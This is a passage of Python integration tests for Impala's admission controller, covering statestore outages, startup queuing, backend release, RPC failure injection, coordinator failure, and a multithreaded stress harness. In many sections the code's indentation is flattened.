  self.close(long_query_resp.operationHandle)
  # Close the queued query.
  self.close(queued_query_resp.operationHandle)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=3,
pool_max_mem=1024 * 1024 * 1024) +
" --admission_control_stale_topic_threshold_ms={0}".format(
STALE_TOPIC_THRESHOLD_MS),
statestored_args=_STATESTORED_ARGS)
def test_statestore_outage(self):
"""Test behaviour with a failed statestore. Queries should continue to be admitted
but we should generate diagnostics about the stale topic."""
self.cluster.statestored.kill()
impalad = self.get_ac_process()
# Sleep until the update should be definitely stale.
sleep(STALE_TOPIC_THRESHOLD_MS / 1000. * 1.5)
# The admission debug page should report how long ago the last statestore update
# arrived and carry a human-readable staleness warning.
ac_json = impalad.service.get_debug_webpage_json('/admission')
ms_since_update = ac_json["statestore_admission_control_time_since_last_update_ms"]
assert ms_since_update > STALE_TOPIC_THRESHOLD_MS
assert ("Warning: admission control information from statestore is stale:" in
ac_json["statestore_update_staleness_detail"])
# Submit a batch of queries. One should get to run, one will be rejected because
# of the full queue, and the others will run after being queued.
STMT = "select sleep(100)"
TIMEOUT_S = 60
NUM_QUERIES = 5
profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)],
TIMEOUT_S, allow_query_failure=True)
ADMITTED_STALENESS_WARNING = \
"Warning: admission control information from statestore is stale"
ADMITTED_STALENESS_PROFILE_ENTRY = \
"Admission control state staleness: " + ADMITTED_STALENESS_WARNING
# Classify each profile into exactly one of the three admission outcomes and check
# that the staleness warning is surfaced through the channel relevant to each.
num_queued = 0
num_admitted_immediately = 0
num_rejected = 0
for profile in profiles:
if "Admission result: Admitted immediately" in profile:
assert ADMITTED_STALENESS_PROFILE_ENTRY in profile, profile
num_admitted_immediately += 1
elif "Admission result: Rejected" in profile:
num_rejected += 1
# Check that the rejection error returned to the client contains a warning.
query_statuses = [line for line in profile.split("\n")
if "Query Status:" in line]
assert len(query_statuses) == 1, profile
assert ADMITTED_STALENESS_WARNING in query_statuses[0]
else:
assert "Admission result: Admitted (queued)" in profile, profile
assert ADMITTED_STALENESS_PROFILE_ENTRY in profile, profile
# Check that the queued reason contains a warning.
queued_reasons = [line for line in profile.split("\n")
if "Initial admission queue reason:" in line]
assert len(queued_reasons) == 1, profile
assert ADMITTED_STALENESS_WARNING in queued_reasons[0]
num_queued += 1
# max_requests=1 admits one immediately; max_queued=3 queues three; the remainder
# must have been rejected for a full queue.
assert num_admitted_immediately == 1
assert num_queued == 3
assert num_rejected == NUM_QUERIES - num_admitted_immediately - num_queued
@pytest.mark.execute_serially
def test_impala_server_startup_delay(self):
  """This test verifies that queries get queued when the coordinator has already
  started accepting client connections during startup, but the local backend
  descriptor is not yet available."""
  server_start_delay_s = 20

  # We need to start the cluster here instead of during setup_method() so we can
  # launch it from a separate thread.
  def start_cluster():
    LOG.info("Starting cluster")
    impalad_args = "--debug_actions=IMPALA_SERVER_END_OF_START:SLEEP@%s" % (
        1000 * server_start_delay_s)
    self._start_impala_cluster(['--impalad_args=%s' % impalad_args])

  # Kick off the cluster start in the background.
  startup_thread = threading.Thread(target=start_cluster)
  startup_thread.start()
  # Give the daemons time to arrive at IMPALA_SERVER_END_OF_START.
  sleep(server_start_delay_s)
  # With a new client, execute a query and observe that it gets queued and
  # ultimately succeeds.
  client = self.create_impala_client()
  result = self.execute_query_expect_success(client, "select 1")
  startup_thread.join()
  queue_reasons = self.__extract_init_queue_reasons([result.runtime_profile])
  assert len(queue_reasons) == 1
  assert "Coordinator not registered with the statestore." in queue_reasons[0]
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(num_exclusive_coordinators=1)
def test_release_backends(self, vector):
  """Test that executor backends are shutdown when they complete, that completed
  executor backends release their admitted memory, and that
  NumCompletedBackends is updated each time an executor backend completes."""
  if self.exploration_strategy() != 'exhaustive':
    pytest.skip('runs only in exhaustive')
  # Craft a query where part of the executor backends completes, while the rest remain
  # running indefinitely. The query forces the 'lineitem' table to be treated as the
  # small table even though it is bigger than the 'customer' table. This forces the
  # small table scan ('lineitem' scan) to run on two nodes and the big table scan
  # ('customers' scan) to run on a single node. By using debug actions to force the
  # big table scan to hang indefinitely, the small table scan should finish quickly.
  # This causes one executor backend to complete quickly, and causes the other one to
  # hang.
  vector.get_value('exec_option')['debug_action'] = '0:GETNEXT:WAIT'
  query = "select STRAIGHT_JOIN * from tpch.customer JOIN /* +BROADCAST */ " \
      "tpch.lineitem where customer.c_custkey = lineitem.l_orderkey limit 100"
  # Amount of time to wait for the query to reach the running state before throwing a
  # Timeout exception.
  timeout = 10
  handle = self.execute_query_async(query, vector.get_value('exec_option'))
  try:
    # Wait for the query to reach the running state (it should never reach the
    # finished state because of the 'WAIT' debug action), wait for the 'lineitem'
    # scan to complete, and then validate that one of the executor backends shuts
    # down and releases its admitted memory.
    self.wait_for_state(handle, self.client.QUERY_STATES['RUNNING'], timeout)
    # Once the 'lineitem' scan completes, NumCompletedBackends should be 1.
    self.assert_eventually(60, 1, lambda: "NumCompletedBackends: 1 (1)"
        in self.client.get_runtime_profile(handle))
    # Fixed: this comparison was previously a bare expression whose result was
    # discarded; assert it so a wrong completed-backend count fails the test.
    assert get_num_completed_backends(self.cluster.impalads[0].service,
        handle.get_handle().id) == 1
    # Exactly one executor backend should have released its admitted memory.
    mem_admitted = \
        get_mem_admitted_backends_debug_page(self.cluster, self.get_ac_process())
    num_executor_zero_admitted = 0
    for executor_mem_admitted in mem_admitted['executor']:
      if executor_mem_admitted == 0:
        num_executor_zero_admitted += 1
    assert num_executor_zero_admitted == 1
  finally:
    # Once the query is closed, validate that all backends have shutdown.
    self.client.close_query(handle)
    mem_admitted = get_mem_admitted_backends_debug_page(self.cluster)
    assert mem_admitted['coordinator'] == 0
    for executor_mem_admitted in mem_admitted['executor']:
      assert executor_mem_admitted == 0
class TestAdmissionControllerWithACService(TestAdmissionController):
"""Runs all of the tests from TestAdmissionController but with the second impalad in the
minicluster configured to perform all admission control."""
def get_ac_process(self):
# In this suite the dedicated admissiond process makes all admission decisions.
return self.cluster.admissiond
def get_ac_log_name(self):
# Daemon name used when locating admission-control log output.
return "admissiond"
def setup_method(self, method):
# These tests each start a custom minicluster, so only run them in exhaustive.
if self.exploration_strategy() != 'exhaustive':
pytest.skip('runs only in exhaustive')
# NOTE: 'func_dict' is the Python 2 spelling of the function's __dict__; the
# with_args() decorator stores its cluster-startup arguments there.
if 'start_args' not in method.func_dict:
method.func_dict['start_args'] = list()
# Start the cluster with a separate admission control service process.
method.func_dict["start_args"].append("--enable_admission_service")
# Flags the test intended for the admission-controlling impalad must instead be
# applied to the admissiond in this configuration.
if "impalad_args" in method.func_dict:
method.func_dict["admissiond_args"] = method.func_dict["impalad_args"]
# NOTE(review): super() is passed TestAdmissionController (this class's base),
# which skips any setup_method override on the base itself — confirm intended.
super(TestAdmissionController, self).setup_method(method)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(impalad_args="--admission_max_retry_time_s=5")
def test_admit_query_retry(self):
"""Tests that if the AdmitQuery rpc fails with a network error, either before or after
reaching the admissiond and being processed, it will be retried and the query will
eventually succeed."""
# Query designed to run for a few seconds.
query = "select count(*) from functional.alltypes where int_col = sleep(10)"
# Run the query with a debug action that will sometimes return errors from AdmitQuery
# even though the admissiond started scheduling successfully. Tests the path where the
# admissiond received multiple AdmitQuery rpcs with the same query id.
before_kill_handle = self.execute_query_async(
query, {"DEBUG_ACTION": "ADMIT_QUERY_NETWORK_ERROR:FAIL@0.5"})
timeout_s = 10
# Make sure the query is through admission control before killing the admissiond. It
# should be unaffected and finish successfully.
self.wait_for_state(
before_kill_handle, self.client.QUERY_STATES['RUNNING'], timeout_s)
self.cluster.admissiond.kill()
result = self.client.fetch(query, before_kill_handle)
assert result.data == ["730"]
# Run another query and sleep briefly before starting the admissiond again. It should
# retry until the admissiond is available again and then succeed.
after_kill_handle = self.execute_query_async(query)
sleep(1)
self.cluster.admissiond.start()
result = self.client.fetch(query, after_kill_handle)
assert result.data == ["730"]
# Kill the admissiond again and don't restart it this time. The query should
# eventually time out on retrying and fail.
self.cluster.admissiond.kill()
no_restart_handle = self.execute_query_async(query)
try:
result = self.client.fetch(query, no_restart_handle)
assert False, "Query should have failed"
except ImpalaBeeswaxException as e:
# --admission_max_retry_time_s=5 bounds how long AdmitQuery is retried.
assert "Failed to admit query after waiting " in str(e)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--vmodule admission-controller=3 --default_pool_max_requests=1 "
"--debug_actions=IMPALA_SERVICE_POOL:127.0.0.1:29500:ReleaseQuery:FAIL@1.0")
def test_release_query_failed(self):
"""Tests that if the ReleaseQuery rpc fails, the query's resources will eventually be
cleaned up. Uses the --debug_action flag to simulate rpc failures, and sets max
requests for the default pool as the number of requests per pool is decremented when
the entire query is released."""
# Query designed to run for a few minutes.
query = "select count(*) from functional.alltypes where int_col = sleep(10000)"
handle1 = self.execute_query_async(query)
timeout_s = 10
# Make sure the first query has been admitted.
self.wait_for_state(
handle1, self.client.QUERY_STATES['RUNNING'], timeout_s)
# Run another query. This query should be queued because only 1 query is allowed in
# the default pool.
handle2 = self.execute_query_async(query)
self._wait_for_change_to_profile(handle2, "Admission result: Queued")
# Cancel the first query. Its resources should be released (despite every
# ReleaseQuery rpc failing) and the second query should be admitted.
self.client.cancel(handle1)
self.client.close_query(handle1)
self.wait_for_state(
handle2, self.client.QUERY_STATES['RUNNING'], timeout_s)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--vmodule admission-controller=3 "
"--debug_actions=IMPALA_SERVICE_POOL:127.0.0.1:29500:ReleaseQueryBackends:FAIL@1.0 "
"--admission_control_slots=1 --executor_groups=default-pool-group1")
def test_release_query_backends_failed(self):
"""Tests that if the ReleaseQueryBackends rpc fails, the query's resources will
eventually be cleaned up. Uses the --debug_action flag to simulate rpc failures, and
sets the number of slots for a single pool as slot usage per executor is decremented
when releasing individual backends."""
# Query designed to run for a few minutes.
query = "select count(*) from functional.alltypes where int_col = sleep(10000)"
handle1 = self.execute_query_async(query)
timeout_s = 10
# Make sure the first query has been admitted.
self.wait_for_state(
handle1, self.client.QUERY_STATES['RUNNING'], timeout_s)
# Run another query. This query should be queued because the executor group only has 1
# slot.
handle2 = self.execute_query_async(query)
self._wait_for_change_to_profile(handle2, "Admission result: Queued")
# Cancel the first query. Its resources should be released (despite every
# ReleaseQueryBackends rpc failing) and the second query should be admitted.
self.client.cancel(handle1)
self.client.close_query(handle1)
self.wait_for_state(
handle2, self.client.QUERY_STATES['RUNNING'], timeout_s)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--vmodule admission-controller=3 --default_pool_max_requests=1")
def test_coordinator_failed(self):
"""Tests that if a coordinator fails, the resources for queries running at that
coordinator are eventually released."""
# Query designed to run for a few minutes.
query = "select count(*) from functional.alltypes where int_col = sleep(10000)"
impalad1 = self.cluster.impalads[0]
client1 = impalad1.service.create_beeswax_client()
handle1 = client1.execute_async(query)
timeout_s = 10
# Make sure the first query has been admitted.
self.wait_for_state(
handle1, self.client.QUERY_STATES['RUNNING'], timeout_s, client=client1)
# Run another query with a different coordinator. This query should be queued because
# only 1 query is allowed in the default pool.
impalad2 = self.cluster.impalads[1]
client2 = impalad2.service.create_beeswax_client()
handle2 = client2.execute_async(query)
self._wait_for_change_to_profile(handle2, "Admission result: Queued", client=client2)
# Kill the coordinator for the first query. The resources for the query should get
# cleaned up and the second query should be admitted.
impalad1.kill()
self.wait_for_state(
handle2, self.client.QUERY_STATES['RUNNING'], timeout_s, client=client2)
class TestAdmissionControllerStress(TestAdmissionControllerBase):
"""Submits a number of queries (parameterized) with some delay between submissions
(parameterized) and the ability to submit to one impalad or many in a round-robin
fashion. Each query is submitted on a separate thread. After admission, the query
thread will block with the query open and wait for the main thread to notify it to
end its query. The query thread can end its query by fetching to the end, cancelling
itself, closing itself, or waiting for the query timeout to take effect. Depending
on the test parameters a varying number of queries will be admitted, queued, and
rejected. After the queries are admitted, the main thread will request each admitted
query thread to end its query and allow queued queries to be admitted.
The test tracks the state of the admission controller using the metrics from each
impalad to do the following:
(1) After submitting all queries, the change in metrics for the number of admitted,
queued, and rejected requests should sum to the number of queries and that the
values are reasonable given the test parameters.
(2) While there are running queries:
* Request the currently running queries to end and wait for the queries to end.
Verify the metric for the number of completed queries. The threads that
submitted those queries will keep their connections open until the entire test
completes. This verifies that admission control is tied to the end of the query
and does not depend on closing the connection.
* Check that queued requests are then dequeued and verify using the metric for the
number of dequeued requests. The threads that were waiting to submit the query
should then insert themselves into a list of currently running queries and then
wait for a notification from the main thread.
(3) After all queries have completed, check that the final number of admitted,
queued, and rejected requests are reasonable given the test parameters. When
submitting to a single impalad, we know exactly what the values should be,
otherwise we just check that they are within reasonable bounds.
"""
@classmethod
def add_test_dimensions(cls):
"""Builds the test matrix: submission mode and delay dimensions, plus a
build-dependent number of queries to submit."""
super(TestAdmissionControllerStress, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('round_robin_submission', *ROUND_ROBIN_SUBMISSION))
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('submission_delay_ms', *SUBMISSION_DELAY_MS))
# Additional constraints for code coverage jobs and core.
num_queries = 50
if ImpalaTestClusterProperties.get_instance().has_code_coverage():
# Code coverage builds can't handle the increased concurrency.
num_queries = 15
elif cls.exploration_strategy() == 'core':
num_queries = 30
# Restrict to immediate round-robin submission; the other dimension values are
# only exercised by broader exploration strategies.
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('submission_delay_ms') == 0)
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('round_robin_submission'))
# The number of queries to submit. The test does not support fewer queries than
# MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES to keep some validation logic
# simple.
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('num_queries', num_queries))
def setup(self):
# All threads are stored in this list and it's used just to make sure we clean up
# properly in teardown.
self.all_threads = list()
# Each submission thread will append() itself to this list if the query begins
# execution. The main thread will access this list to determine which threads are
# executing queries that can be cancelled (it will pop() elements from the front of
# the list). The individual operations on the list are atomic and thread-safe thanks
# to the GIL.
self.executing_threads = list()
def teardown(self):
"""Requests every submission thread to shut down, cancels any query it still has
open, then joins the threads."""
# Set shutdown for all threads (cancel if needed)
for thread in self.all_threads:
try:
# Hold the thread's lock so 'shutdown'/'query_handle' are not mutated while we
# inspect them.
thread.lock.acquire()
thread.shutdown = True
if thread.query_handle is not None:
LOG.debug("Attempt to clean up thread executing query %s (state %s)",
thread.query_num, thread.query_state)
# Cancel via a fresh client against the thread's own impalad; closed again
# immediately so no connection leaks out of teardown.
client = thread.impalad.service.create_beeswax_client()
try:
client.cancel(thread.query_handle)
finally:
client.close()
finally:
thread.lock.release()
# Wait for all threads to exit
for thread in self.all_threads:
# Bounded join: a stuck thread is logged as TIMED OUT rather than hanging teardown.
thread.join(5)
LOG.debug("Join thread for query num %s %s", thread.query_num,
"TIMED OUT" if thread.isAlive() else "")
def get_ac_processes(self):
  """Returns a list of all Processes which may be used to perform admission control.
  If round-robin submission is not being used, only the first Process in this list
  will perform admission control."""
  admission_capable = self.cluster.impalads
  return admission_capable
def get_admission_metrics(self):
  """
  Returns a map of the admission metrics, aggregated across all of the impalads.
  The metric names are shortened for brevity: 'admitted', 'queued', 'dequeued',
  'rejected', 'released', and 'timed-out'.
  """
  short_names = ['admitted', 'queued', 'dequeued', 'rejected', 'released',
                 'timed-out']
  totals = dict((name, 0) for name in short_names)
  for impalad in self.ac_processes:
    # Fetch all six counters from this daemon in one rpc, defaulting any missing
    # metric to zero.
    keys = [metric_key(self.pool_name, 'total-%s' % name) for name in short_names]
    values = impalad.service.get_metric_values(keys, [0] * len(keys))
    for name, value in zip(short_names, values):
      totals[name] += value
  return totals
def get_consistent_admission_metrics(self, num_submitted):
  """Same as get_admission_metrics() except retries until it gets consistent metrics
  for num_submitted queries. See IMPALA-6227 for an example of problems with
  inconsistent metrics where a dequeued query is reflected in dequeued but not
  admitted."""
  MAX_ATTEMPTS = 5
  metrics = None
  for _ in xrange(MAX_ATTEMPTS):
    metrics = self.get_admission_metrics()
    # Every submitted query is either queued, rejected, or admitted immediately, so
    # immediate admissions plus dequeues must add up to total admissions.
    admitted_immediately = num_submitted - metrics['queued'] - metrics['rejected']
    if admitted_immediately + metrics['dequeued'] == metrics['admitted']:
      return metrics
    LOG.info("Got inconsistent metrics {0}".format(metrics))
  assert False, "Could not get consistent metrics for {0} queries after {1} attempts: "\
      "{2}".format(num_submitted, MAX_ATTEMPTS, metrics)
def wait_for_metric_changes(self, metric_names, initial, expected_delta):
"""
Waits for the sum of metrics in metric_names to change by at least expected_delta.
This is similar to ImpalaService.wait_for_metric_value(), but it uses one or more
metrics aggregated across all impalads, e.g. we want to wait for the total number of
admitted, queued, and rejected metrics to change some amount in total, but we don't
know exactly how the metrics will change individually.
'metric_names' is a list of the keys returned by get_admission_metrics() which are
expected to change.
'initial' is the initial set of metrics returned by get_admission_metrics() to
compare against.
'expected_delta' is the total change expected across all impalads for the specified
metrics.
Returns a tuple (deltas, current) of the per-metric deltas and the final snapshot.
"""
log_metrics("wait_for_metric_changes, initial=", initial)
current = initial
start_time = time()
# Poll once per second until the summed delta reaches the target or STRESS_TIMEOUT
# elapses.
while True:
current = self.get_admission_metrics()
log_metrics("wait_for_metric_changes, current=", current)
deltas = compute_metric_deltas(current, initial)
delta_sum = sum([deltas[x] for x in metric_names])
LOG.info("DeltaSum=%s Deltas=%s (Expected=%s for metrics=%s)",
delta_sum, deltas, expected_delta, metric_names)
if delta_sum >= expected_delta:
LOG.info("Found all %s metrics after %s seconds", delta_sum,
round(time() - start_time, 1))
return (deltas, current)
assert (time() - start_time < STRESS_TIMEOUT),\
"Timed out waiting {0} seconds for metrics {1} delta {2} "\
"current {3} initial {4}" .format(
STRESS_TIMEOUT, ','.join(metric_names), expected_delta, str(current),
str(initial))
sleep(1)
def wait_for_statestore_updates(self, heartbeats):
"""Waits for a number of admission control statestore updates from all impalads.

'heartbeats' is the minimum number of additional topic-update intervals each
impalad must record before this returns. Fails if STRESS_TIMEOUT elapses first."""
start_time = time()
# Snapshot the per-impalad update counters so we can measure the delta.
init = dict()
curr = dict()
# NOTE(review): assumes self.impalads was populated by the test body before this is
# called — it is not set in setup().
for impalad in self.impalads:
init[impalad] = impalad.service.get_metric_value(
REQUEST_QUEUE_UPDATE_INTERVAL)['count']
curr[impalad] = init[impalad]
# Poll at roughly the statestore rpc frequency until every impalad has advanced by
# at least 'heartbeats' updates.
while True:
LOG.debug("wait_for_statestore_updates: curr=%s, init=%s, d=%s", curr.values(),
init.values(), [curr[i] - init[i] for i in self.impalads])
if all([curr[i] - init[i] >= heartbeats for i in self.impalads]): break
for impalad in self.impalads:
curr[impalad] = impalad.service.get_metric_value(
REQUEST_QUEUE_UPDATE_INTERVAL)['count']
assert (time() - start_time < STRESS_TIMEOUT),\
"Timed out waiting %s seconds for heartbeats" % (STRESS_TIMEOUT,)
sleep(STATESTORE_RPC_FREQUENCY_MS / float(1000))
LOG.info("Waited %s for %s heartbeats", round(time() - start_time, 1), heartbeats)
def wait_for_admitted_threads(self, num_threads):
"""
Wait for query submission threads to update after being admitted, as determined
by observing metric changes. This is necessary because the metrics may change
before the execute_async() calls on the query threads return and add themselves
to self.executing_threads.
"""
start_time = time()
LOG.info("Waiting for %s threads to begin execution", num_threads)
# All individual list operations are thread-safe, so we don't need to use a
# lock to synchronize before checking the list length (on which another thread
# may call append() concurrently).
while len(self.executing_threads) < num_threads:
assert (time() - start_time < STRESS_TIMEOUT), ("Timed out waiting %s seconds for "
"%s admitted client rpcs to return. Only %s executing " % (
STRESS_TIMEOUT, num_threads, len(self.executing_threads)))
sleep(0.1)
LOG.info("Found all %s admitted threads after %s seconds", num_threads,
round(time() - start_time, 1))
  def end_admitted_queries(self, num_queries):
    """
    Requests each admitted query to end its query.

    Pops 'num_queries' threads off self.executing_threads, flips their state to
    REQUEST_QUERY_END, then blocks until every thread has acknowledged by moving
    out of that state. Asserts on STRESS_TIMEOUT.
    """
    assert len(self.executing_threads) >= num_queries
    LOG.info("Requesting {0} clients to end queries".format(num_queries))
    # Request admitted clients to end their queries
    current_executing_queries = []
    for i in xrange(num_queries):
      # pop() is thread-safe, it's OK if another thread is appending concurrently.
      thread = self.executing_threads.pop(0)
      LOG.info("Cancelling query %s", thread.query_num)
      assert thread.query_state == 'ADMITTED'
      current_executing_queries.append(thread)
      # The worker thread polls query_state and performs the actual query end.
      thread.query_state = 'REQUEST_QUERY_END'
    # Wait for the queries to end
    start_time = time()
    while True:
      all_done = True
      # A thread still in REQUEST_QUERY_END has not yet processed the request.
      for thread in self.all_threads:
        if thread.query_state == 'REQUEST_QUERY_END':
          all_done = False
      if all_done:
        break
      assert (time() - start_time < STRESS_TIMEOUT),\
          "Timed out waiting %s seconds for query end" % (STRESS_TIMEOUT,)
      sleep(1)
  class SubmitQueryThread(threading.Thread):
    """Daemon thread that submits a single query and drives it through its lifecycle.

    The thread communicates with the main test thread through 'query_state'
    (a test-side state machine: NOT_SUBMITTED -> SUBMITTING -> ADMITTED/REJECTED/
    TIMED OUT -> REQUEST_QUERY_END -> COMPLETED, or ERROR) and by appending itself
    to the shared 'executing_threads' list once admitted.
    """
    def __init__(self, impalad, additional_query_options, vector, query_num,
        query_end_behavior, executing_threads):
      """
      executing_threads must be provided so that this thread can add itself when the
      query is admitted and begins execution.
      """
      super(self.__class__, self).__init__()
      self.executing_threads = executing_threads
      self.vector = vector
      self.additional_query_options = additional_query_options
      self.query_num = query_num
      # One of QUERY_END_BEHAVIORS: how the query should be brought to an end.
      self.query_end_behavior = query_end_behavior
      self.impalad = impalad
      self.error = None
      # query_state is defined and used only by the test code, not a property exposed by
      # the server
      self.query_state = 'NOT_SUBMITTED'
      # lock protects query_handle and shutdown, used by the main thread in teardown()
      self.lock = threading.RLock()
      self.query_handle = None
      self.shutdown = False  # Set by the main thread when tearing down
      self.setDaemon(True)

    def run(self):
      client = None
      try:
        try:
          # Take the lock while query_handle is being created to avoid an unlikely race
          # condition with teardown() (i.e. if an error occurs on the main thread), and
          # check if the test is already shut down.
          self.lock.acquire()
          if self.shutdown:
            return
          exec_options = self.vector.get_value('exec_option')
          exec_options.update(self.additional_query_options)
          # Turning off result spooling allows us to better control query execution by
          # controlling the number or rows fetched. This allows us to maintain resource
          # usage among backends.
          exec_options['spool_query_results'] = 0
          query = QUERY.format(self.query_num)
          self.query_state = 'SUBMITTING'
          client = self.impalad.service.create_beeswax_client()
          ImpalaTestSuite.change_database(client, self.vector.get_value('table_format'))
          client.set_configuration(exec_options)
          if self.query_end_behavior == 'QUERY_TIMEOUT':
            client.execute("SET QUERY_TIMEOUT_S={0}".format(QUERY_END_TIMEOUT_S))
          LOG.info("Submitting query %s", self.query_num)
          self.query_handle = client.execute_async(query)
          # Block until admission control has admitted, queued+admitted, rejected,
          # or timed out the query, then inspect the decision.
          client.wait_for_admission_control(self.query_handle)
          admission_result = client.get_admission_result(self.query_handle)
          assert len(admission_result) > 0
          if "Rejected" in admission_result:
            LOG.info("Rejected query %s", self.query_num)
            self.query_state = 'REJECTED'
            self.query_handle = None
            return
          elif "Timed out" in admission_result:
            LOG.info("Query %s timed out", self.query_num)
            self.query_state = 'TIMED OUT'
            self.query_handle = None
            return
          LOG.info("Admission result for query %s : %s", self.query_num, admission_result)
        except ImpalaBeeswaxException as e:
          LOG.exception(e)
          raise e
        finally:
          self.lock.release()
        LOG.info("Admitted query %s", self.query_num)
        self.query_state = 'ADMITTED'
        # The thread becomes visible to the main thread when it is added to the
        # shared list of executing_threads. append() is atomic and thread-safe.
        self.executing_threads.append(self)
        # Synchronize with the main thread. At this point, the thread is executing a
        # query. It needs to wait until the main thread requests it to end its query.
        while not self.shutdown:
          # The QUERY_TIMEOUT needs to stay active until the main thread requests it
          # to end. Otherwise, the query may get cancelled early. Fetch rows 2 times
          # per QUERY_TIMEOUT interval to keep the query active.
          if self.query_end_behavior == 'QUERY_TIMEOUT' and \
             self.query_state != 'COMPLETED':
            fetch_result = client.fetch(query, self.query_handle, 1)
            assert len(fetch_result.data) == 1, str(fetch_result)
          if self.query_state == 'REQUEST_QUERY_END':
            self._end_query(client, query)
            # The query has released admission control resources
            self.query_state = 'COMPLETED'
            self.query_handle = None
          sleep(QUERY_END_TIMEOUT_S / 6)
      except Exception as e:
        LOG.exception(e)
        # Unknown errors will be raised later
        self.error = e
        self.query_state = 'ERROR'
      finally:
        LOG.info("Thread terminating in state=%s", self.query_state)
        if client is not None:
          try:
            self.lock.acquire()
            client.close()
            # Closing the client closes the query as well
            self.query_handle = None
          finally:
            self.lock.release()

    def _end_query(self, client, query):
      """Bring the query to the appropriate end state defined by self.query_end_behaviour.
      Returns once the query has reached that state."""
      LOG.info("Ending query %s by %s",
          str(self.query_handle.get_handle()), self.query_end_behavior)
      if self.query_end_behavior == 'QUERY_TIMEOUT':
        # Sleep and wait for the query to be cancelled. The cancellation will
        # set the state to EXCEPTION.
        start_time = time()
        while (client.get_state(self.query_handle) !=
               client.QUERY_STATES['EXCEPTION']):
          assert (time() - start_time < STRESS_TIMEOUT),\
              "Timed out waiting %s seconds for query cancel" % (STRESS_TIMEOUT,)
          sleep(1)
      elif self.query_end_behavior == 'EOS':
        # Fetch all rows so we hit eos.
        client.fetch(query, self.query_handle)
      elif self.query_end_behavior == 'CLIENT_CANCEL':
        client.cancel(self.query_handle)
      else:
        assert self.query_end_behavior == 'CLIENT_CLOSE'
        client.close_query(self.query_handle)
  def _check_queries_page_resource_pools(self):
    """Checks that all queries in the '/queries' webpage json have the correct resource
    pool (this is called after all queries have been admitted, queued, or rejected, so
    they should already have the pool set), or no pool for queries that don't go through
    admission control."""
    for impalad in self.impalads:
      queries_json = impalad.service.get_debug_webpage_json('/queries')
      # Inspect both running and finished queries on this impalad.
      for query in itertools.chain(queries_json['in_flight_queries'],
          queries_json['completed_queries']):
        if query['stmt_type'] == 'QUERY' or query['stmt_type'] == 'DML':
          # QUERY/DML statements go through admission control, so by this point
          # they must have progressed past registration/planning and carry a pool.
          assert query['last_event'] != 'Registered' and \
              query['last_event'] != 'Planning finished'
          assert query['resource_pool'] == self.pool_name
        else:
          # Other statement kinds (DDL etc.) bypass admission control entirely.
          assert query['resource_pool'] == ''
def _get_queries_page_num_queued(self):
"""Returns the number of queries currently in the 'queued' state from the '/queries'
webpage json"""
num_queued = 0
for impalad in self.impalads:
queries_json = impalad.service.get_debug_webpage_json('/queries')
for query in queries_json['in_flight_queries']:
if query['last_event'] == 'Queued':
num_queued += 1
return num_queued
def wait_on_queries_page_num_queued(self, min_queued, max_queued):
start_time = time()
LOG.info("Waiting for %s <= queued queries <= %s" % (min_queued, max_queued))
actual_queued = self._get_queries_page_num_queued()
while actual_queued < min_queued or actual_queued > max_queued:
assert (time() - start_time < STRESS_TIMEOUT), ("Timed out waiting %s seconds for "
"%s <= queued queries <= %s, %s currently queued.",
STRESS_TIMEOUT, min_queued, max_queued, actual_queued)
sleep(0.1)
actual_queued = self._get_queries_page_num_queued()
LOG.info("Found %s queued queries after %s seconds", actual_queued,
round(time() - start_time, 1))
  def run_admission_test(self, vector, additional_query_options):
    """Drives the whole stress scenario: submits 'num_queries' queries (spread
    round-robin over impalads if configured), checks the initial admit/queue/reject
    decisions against the configured limits, then ends queries in waves and checks
    that queued queries are admitted as capacity frees up. Raises the first error
    recorded by any submission thread."""
    LOG.info("Starting test case with parameters: %s", vector)
    self.impalads = self.cluster.impalads
    self.ac_processes = self.get_ac_processes()
    round_robin_submission = vector.get_value('round_robin_submission')
    submission_delay_ms = vector.get_value('submission_delay_ms')
    # Without round-robin, all queries are submitted to a single coordinator.
    if not round_robin_submission:
      self.impalads = [self.impalads[0]]
      self.ac_processes = [self.ac_processes[0]]
    num_queries = vector.get_value('num_queries')
    assert num_queries >= MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES
    initial_metrics = self.get_admission_metrics()
    log_metrics("Initial metrics: ", initial_metrics)
    # Launch one SubmitQueryThread per query, cycling through the impalads and
    # the query-end behaviors.
    for query_num in xrange(num_queries):
      impalad = self.impalads[query_num % len(self.impalads)]
      query_end_behavior = QUERY_END_BEHAVIORS[query_num % len(QUERY_END_BEHAVIORS)]
      thread = self.SubmitQueryThread(impalad, additional_query_options, vector,
          query_num, query_end_behavior, self.executing_threads)
      thread.start()
      self.all_threads.append(thread)
      sleep(submission_delay_ms / 1000.0)
    # Wait for the admission control to make the initial admission decision for all of
    # the queries. They should either be admitted immediately, queued, or rejected.
    # The test query is chosen that it with remain active on all backends until the test
    # ends the query. This prevents queued queries from being dequeued in the background
    # without this thread explicitly ending them, so that the test can admit queries in
    # discrete waves.
    LOG.info("Wait for initial admission decisions")
    (metric_deltas, curr_metrics) = self.wait_for_metric_changes(
        ['admitted', 'queued', 'rejected'], initial_metrics, num_queries)
    # Also wait for the test threads that submitted the queries to start executing.
    self.wait_for_admitted_threads(metric_deltas['admitted'])
    # Check that the admission decisions are reasonable given the test parameters
    # The number of admitted and queued requests should be at least the configured limits
    # but less than or equal to those limits times the number of impalads.
    assert metric_deltas['dequeued'] == 0,\
        "Queued queries should not run until others are made to finish"
